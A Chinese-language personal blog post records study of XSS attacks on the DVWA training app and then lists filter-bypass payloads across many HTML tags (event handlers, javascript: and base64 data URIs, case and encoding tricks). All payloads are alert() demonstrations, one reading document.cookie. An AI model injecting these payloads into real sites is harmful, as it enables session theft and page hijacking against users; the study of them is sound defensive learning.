<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="XSS攻击学习一、反射型XSS漏洞一般这种攻击具有一次性  XSS平台|CTF欢迎来到XSS挑战|XSS之旅|XSS测试 (ctf8.com) 1、DVWA_security(low)没有对输入的字符进行任何过滤 1&lt;script&gt;alert(1)&lt;&#x2F;script&gt;    2、DVWA_security(medium)查看源代码发现****标签被限制了，被替换了   1&amp;l">
<meta property="og:type" content="article">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/2024/12/08/XSS%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="XSS攻击学习一、反射型XSS漏洞一般这种攻击具有一次性  XSS平台|CTF欢迎来到XSS挑战|XSS之旅|XSS测试 (ctf8.com) 1、DVWA_security(low)没有对输入的字符进行任何过滤 1&lt;script&gt;alert(1)&lt;&#x2F;script&gt;    2、DVWA_security(medium)查看源代码发现****标签被限制了，被替换了   1&amp;l">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="c:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225164139091.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/08a6f6b473aa41a5920944591afa6c4d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASkZfQWRtMDYxNg==,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="c:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225164850690.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/d47a28005ee443249793ee9be403653c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASkZfQWRtMDYxNg==,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="c:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225165626574.png">
<meta property="og:image" content="c:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225184532285.png">
<meta property="og:image" content="c:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225184829352.png">
<meta property="og:image" content="c:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225184750518.png">
<meta property="og:image" content="c:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225185057000.png">
<meta property="og:image" content="c:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225185130636.png">
<meta property="og:image" content="c:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225185315964.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/bfcfbf93615848eaa5f28ee7761830da.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASkZfQWRtMDYxNg==,size_20,color_FFFFFF,t_70,g_se,x_16">
<meta property="og:image" content="c:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225170154044.png">
<meta property="og:image" content="c:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225170314867.png">
<meta property="og:image" content="c:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20241016195117368.png">
<meta property="og:image" content="c:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20241016195355594.png">
<meta property="og:image" content="c:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20241016195406999.png">
<meta property="article:published_time" content="2024-12-08T12:37:17.831Z">
<meta property="article:modified_time" content="2024-12-08T12:37:18.015Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="c:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225164139091.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://example.com"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-XSS攻击学习" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2024/12/08/XSS%E6%94%BB%E5%87%BB%E5%AD%A6%E4%B9%A0/" class="article-date">
  <time class="dt-published" datetime="2024-12-08T12:37:17.831Z" itemprop="datePublished">2024-12-08</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <h1 id="XSS攻击学习"><a href="#XSS攻击学习" class="headerlink" title="XSS攻击学习"></a>XSS攻击学习</h1><h2 id="一、反射型XSS漏洞"><a href="#一、反射型XSS漏洞" class="headerlink" title="一、反射型XSS漏洞"></a>一、反射型XSS漏洞</h2><p>一般这种攻击具有一次性</p>
<p> <a target="_blank" rel="noopener" href="http://test.ctf8.com/">XSS平台|CTF欢迎来到XSS挑战|XSS之旅|XSS测试 (ctf8.com)</a></p>
<h3 id="1、DVWA-security-low"><a href="#1、DVWA-security-low" class="headerlink" title="1、DVWA_security(low)"></a>1、DVWA_security(low)</h3><p>没有对输入的字符进行任何过滤</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;<span class="title function_">alert</span>(<span class="number">1</span>)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<img src="C:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225164139091.png" alt="image-20231225164139091" style="zoom:33%;" />

<h3 id="2、DVWA-security-medium"><a href="#2、DVWA-security-medium" class="headerlink" title="2、DVWA_security(medium)"></a>2、DVWA_security(medium)</h3><p>查看源代码发现**<script>**标签被限制了，被替换了</p>
<img src="https://img-blog.csdnimg.cn/08a6f6b473aa41a5920944591afa6c4d.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASkZfQWRtMDYxNg==,size_20,color_FFFFFF,t_70,g_se,x_16" alt="img"  />

<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;scr&lt;script&gt;ipt&gt;<span class="title function_">alert</span>(<span class="number">1</span>)&lt;/script&gt;</span><br></pre></td></tr></table></figure>

<img src="C:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225164850690.png" alt="image-20231225164850690" style="zoom:33%;" />

<p>也可以大小写绕过</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;<span class="title class_">Script</span>&gt;<span class="title function_">alert</span>(<span class="number">1</span>)&lt;/script&gt;</span><br></pre></td></tr></table></figure>



<h3 id="3、DVWA-security-high"><a href="#3、DVWA-security-high" class="headerlink" title="3、DVWA_security(high)"></a>3、DVWA_security(high)</h3><p>查看源代码，发现了更严格的过滤，此时script标签已经没法再用了，那么我们使用别的标签也可以达到我们的目的</p>
<p><img src="https://img-blog.csdnimg.cn/d47a28005ee443249793ee9be403653c.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASkZfQWRtMDYxNg==,size_20,color_FFFFFF,t_70,g_se,x_16" alt="img"></p>
<p>通过这个标签的简写，跳转，来实现</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=<span class="string">&quot;www.baidu.com&quot;</span> name=<span class="string">&quot;iframe_a&quot;</span> width=<span class="string">&quot;1500px&quot;</span> height=<span class="string">&quot;900px&quot;</span>&gt;&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=<span class="string">&quot;www.baidu.com&quot;</span>&gt;&lt;/iframe&gt;</span><br></pre></td></tr></table></figure>

<img src="C:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225165626574.png" alt="image-20231225165626574" style="zoom:80%;" />



<h1 id="二、存储型XSS漏洞"><a href="#二、存储型XSS漏洞" class="headerlink" title="二、存储型XSS漏洞"></a>二、存储型XSS漏洞</h1><h2 id="1、security-low"><a href="#1、security-low" class="headerlink" title="1、security(low)"></a>1、security(low)</h2><p>检查页面</p>
<img src="C:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225184532285.png" alt="image-20231225184532285" style="zoom: 25%;" />

<p>更改限制即可</p>
<img src="C:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225184829352.png" alt="image-20231225184829352" style="zoom: 33%;" />

<p>成功！</p>
<img src="C:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225184750518.png" alt="image-20231225184750518" style="zoom:33%;" />

<p>这时我们修改输入框的数据，点击sign，会发现依然会进行弹框，这就是因为存储型xss把代码存储到后端了</p>
<img src="C:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225185057000.png" alt="image-20231225185057000" style="zoom:25%;" />

<img src="C:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225185130636.png" alt="image-20231225185130636" style="zoom:25%;" />

<p>只要我们重新进行输入别的 如：<script>alert(/xss/)</script></p>
<p>进过几次弹窗就会显示：</p>
<img src="C:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225185315964.png" alt="image-20231225185315964" style="zoom:25%;" />

<h2 id="2、security-medium"><a href="#2、security-medium" class="headerlink" title="2、security(medium)"></a>2、security(medium)</h2><p>和反射型一样，改变大小写或双写就行</p>
<h2 id="3、security-high"><a href="#3、security-high" class="headerlink" title="3、security(high)"></a>3、security(high)</h2><p>和反射型一样，但是需要修改标签，绕过waf</p>
<h2 id="4、impossible"><a href="#4、impossible" class="headerlink" title="4、impossible"></a>4、impossible</h2><p><img src="https://img-blog.csdnimg.cn/bfcfbf93615848eaa5f28ee7761830da.png?x-oss-process=image/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBASkZfQWRtMDYxNg==,size_20,color_FFFFFF,t_70,g_se,x_16" alt="img"></p>
<h1 id="四、绕过方法总结"><a href="#四、绕过方法总结" class="headerlink" title="四、绕过方法总结"></a>四、绕过方法总结</h1><h2 id="1、a标签"><a href="#1、a标签" class="headerlink" title="1、a标签"></a>1、a标签</h2><p>用a标签嵌入链接，点击时会触发恶意代码</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=<span class="string">&#x27;&#x27;</span> onclick=<span class="title function_">alert</span>(<span class="string">&#x27;xss3&#x27;</span>)&gt;click1&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<img src="C:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225170154044.png" alt="image-20231225170154044" style="zoom: 33%;" />

<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;a href=<span class="string">&quot;javascript:alert(1)&quot;</span>&gt;test&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">在&lt;a&gt;标签中添加onfocus属性可以定义当链接获得焦点（被选中）时所触发的事件</span><br><span class="line">&lt;a href=<span class="string">&quot;x&quot;</span> onfocus=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span> autofocus=<span class="string">&quot;&quot;</span>&gt;xss&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">链接被点击就会触发</span><br><span class="line">&lt;a href=<span class="string">&quot;x&quot;</span> onclick=<span class="built_in">eval</span>(<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>)&gt;xss&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">鼠标悬停触发的<span class="variable constant_">XSS</span>攻击。在这个例子中，当用户将鼠标悬停在链接上时，会触发onmouseover事件，该事件将弹出一个警告框显示文本xss。攻击者可以将恶意脚本插入到onmouseover事件处理程序中，以实施更具破坏力的攻击，如窃取用户的敏感信息或劫持用户会话</span><br><span class="line">&lt;a href=<span class="string">&quot;x&quot;</span> onmouseover=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;xss&lt;/a&gt;</span><br><span class="line"></span><br><span class="line">鼠标挪开链接范围就会触发</span><br><span class="line">&lt;a href=<span class="string">&quot;x&quot;</span> onmouseout=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;xss&lt;/a&gt;</span><br></pre></td></tr></table></figure>

<h2 id="2、img标签"><a href="#2、img标签" class="headerlink" title="2、img标签"></a>2、img标签</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=x onerror=<span class="string">&quot;alert(1)&quot;</span>&gt;</span><br><span class="line">&lt;img src=x onerror=eval(&quot;alert(1)&quot;)&gt;</span><br><span class="line">&lt;img src=1 onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br><span class="line">&lt;img src=1 onmouseout=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br><span class="line">&lt;img src=1 onclick=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br></pre></td></tr></table></figure>

<h2 id="3、iframe标签"><a href="#3、iframe标签" class="headerlink" title="3、iframe标签"></a>3、iframe标签</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=<span class="string">&quot;javascript:alert(1)&quot;</span>&gt;test&lt;/iframe&gt;</span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">onload</span>=<span class="string">&quot;alert(document.cookie)&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">onload</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">onload</span>=<span class="string">&quot;base64,YWxlcnQoJ3hzcycpOw==&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">onmouseover</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">iframe</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">iframe</span> <span class="attr">src</span>=<span class="string">&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=&quot;</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<h2 id="4、audio标签"><a href="#4、audio标签" class="headerlink" title="4、audio标签"></a>4、audio标签</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;audio src=<span class="number">1</span> onerror=<span class="title function_">alert</span>(<span class="number">1</span>)&gt;</span><br><span class="line">&lt;audio&gt;&lt;source src=&quot;x&quot; onerror=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/audio&gt;</span><br><span class="line">&lt;audio controls onfocus=eval(&quot;alert(&#x27;xss&#x27;);&quot;) autofocus=&quot;&quot;&gt;&lt;/audio&gt;</span><br><span class="line">&lt;audio controls onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;source src=&quot;x&quot;&gt;&lt;/audio&gt;</span><br></pre></td></tr></table></figure>

<h2 id="5、vedio标签"><a href="#5、vedio标签" class="headerlink" title="5、vedio标签"></a>5、vedio标签</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;video src=x onerror=<span class="title function_">alert</span>(<span class="number">1</span>)&gt;</span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">video</span>&gt;</span><span class="tag">&lt;<span class="name">source</span> <span class="attr">onerror</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">video</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">video</span> <span class="attr">controls</span> <span class="attr">onmouseover</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">video</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">video</span> <span class="attr">controls</span> <span class="attr">onfocus</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span> <span class="attr">autofocus</span>=<span class="string">&quot;&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">video</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">video</span> <span class="attr">controls</span> <span class="attr">onclick</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">video</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<h2 id="6、svg标签绕过"><a href="#6、svg标签绕过" class="headerlink" title="6、svg标签绕过"></a>6、svg标签绕过</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;svg onload=<span class="attr">javascript</span>:<span class="title function_">alert</span>(<span class="number">1</span>)&gt;</span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">svg</span> <span class="attr">onload</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">svg</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<h2 id="7、buttun标签"><a href="#7、buttun标签" class="headerlink" title="7、buttun标签"></a>7、buttun标签</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;button onclick=<span class="title function_">alert</span>(<span class="number">1</span>)&gt;</span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">button</span> <span class="attr">onfocus</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span> <span class="attr">autofocus</span>=<span class="string">&quot;&quot;</span>&gt;</span>xss<span class="tag">&lt;/<span class="name">button</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">button</span> <span class="attr">onclick</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;</span>xss<span class="tag">&lt;/<span class="name">button</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">button</span> <span class="attr">onmouseover</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;</span>xss<span class="tag">&lt;/<span class="name">button</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">button</span> <span class="attr">onmouseout</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;</span>xss<span class="tag">&lt;/<span class="name">button</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">button</span> <span class="attr">onmouseup</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;</span>xss<span class="tag">&lt;/<span class="name">button</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">button</span> <span class="attr">onmousedown</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">button</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<h2 id="8、div标签"><a href="#8、div标签" class="headerlink" title="8、div标签"></a>8、div标签</h2><p>这个需要借助url编码来实现绕过</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">原代码：</span><br><span class="line">&lt;div onmouseover=<span class="string">&#x27;alert(1)&#x27;</span>&gt;<span class="variable constant_">DIV</span>&lt;/div&gt;</span><br><span class="line">经过url编码：</span><br><span class="line">&lt;div onmouseover%3d<span class="string">&#x27;alert%26lpar%3b1%26rpar%3b&#x27;</span>&gt;<span class="variable constant_">DIV</span>&lt;%2fdiv&gt;</span><br></pre></td></tr></table></figure>

<h2 id="9、object标签"><a href="#9、object标签" class="headerlink" title="9、object标签"></a>9、object标签</h2><p>这个需要借助 data 伪协议和 base64 编码来实现绕过</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;object data=<span class="string">&quot;data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=&quot;</span>&gt;&lt;/object&gt;</span><br></pre></td></tr></table></figure>

<h2 id="10、script标签"><a href="#10、script标签" class="headerlink" title="10、script标签"></a>10、script标签</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;script&gt;<span class="title function_">alert</span>(<span class="string">&#x27;xss&#x27;</span>)&lt;/script&gt;</span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"><span class="title function_">alert</span>(<span class="regexp">/xss/</span>)</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">script</span>&gt;</span>alert(123)<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<h2 id="11、p标签"><a href="#11、p标签" class="headerlink" title="11、p标签"></a>11、p标签</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;p onclick=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;xss&lt;/p&gt;</span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">p</span> <span class="attr">onmouseover</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;</span>xss<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">p</span> <span class="attr">onmouseout</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;</span>xss<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">p</span> <span class="attr">onmouseup</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;</span>xss<span class="tag">&lt;/<span class="name">p</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<h2 id="12、input标签"><a href="#12、input标签" class="headerlink" title="12、input标签"></a>12、input标签</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;input onclick=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;</span><br><span class="line">&lt;input onfocus=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br><span class="line">&lt;input onfocus=&quot;alert(&#x27;xss&#x27;);&quot; autofocus=&quot;&quot;&gt;</span><br><span class="line">&lt;input onmouseover=&quot;alert(&#x27;xss&#x27;);&quot;&gt;</span><br><span class="line">&lt;input type=&quot;text&quot; onkeydown=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/input&gt;</span><br><span class="line">&lt;input type=&quot;text&quot; onkeypress=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/input&gt;</span><br><span class="line">&lt;input type=&quot;text&quot; onkeydown=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;/input&gt;</span><br><span class="line">&lt;input action=&quot;submit&quot; value=&quot;alert(1)&quot;&gt;</span><br></pre></td></tr></table></figure>

<h2 id="13、details标签"><a href="#13、details标签" class="headerlink" title="13、details标签"></a>13、details标签</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">&lt;details ontoggle=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;&lt;/details&gt;</span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">details</span> <span class="attr">ontoggle</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span> <span class="attr">open</span>=<span class="string">&quot;&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">details</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<h2 id="14、select-标签"><a href="#14、select-标签" class="headerlink" title="14、select 标签"></a>14、select 标签</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;select onfocus=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span> autofocus&gt;&lt;/select&gt;</span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">select</span> <span class="attr">onmouseover</span>=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">select</span>&gt;</span></span></span><br><span class="line"><span class="language-xml"><span class="tag">&lt;<span class="name">select</span> <span class="attr">onclick</span>=<span class="string">eval(</span>&quot;<span class="attr">alert</span>(&#x27;<span class="attr">xss</span>&#x27;);&quot;)&gt;</span><span class="tag">&lt;/<span class="name">select</span>&gt;</span></span></span><br></pre></td></tr></table></figure>

<h2 id="15、-form-标签"><a href="#15、-form-标签" class="headerlink" title="15、 form 标签"></a>15、 form 标签</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;form method=<span class="string">&quot;x&quot;</span> action=<span class="string">&quot;x&quot;</span> onmouseover=<span class="string">&quot;alert(&#x27;xss&#x27;);&quot;</span>&gt;<span class="language-xml"><span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">submit</span>&gt;</span><span class="tag">&lt;/<span class="name">form</span>&gt;</span></span> </span><br><span class="line">&lt;form method=&quot;x&quot; action=&quot;x&quot; onmouseout=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;input type=submit&gt;&lt;/form&gt; </span><br><span class="line">&lt;form method=&quot;x&quot; action=&quot;x&quot; onmouseup=&quot;alert(&#x27;xss&#x27;);&quot;&gt;&lt;input type=submit&gt;&lt;/form&gt;</span><br></pre></td></tr></table></figure>

<h2 id="16、body标签"><a href="#16、body标签" class="headerlink" title="16、body标签"></a>16、body标签</h2><p>onload的作用当页面载入完毕后执行代码（即弹出对话框）</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;body onload=<span class="title function_">alert</span>(<span class="string">&quot;xss2&quot;</span>)&gt;</span><br></pre></td></tr></table></figure>

<img src="C:\Users\Lenovo\AppData\Roaming\Typora\typora-user-images\image-20231225170314867.png" alt="image-20231225170314867" style="zoom:33%;" />





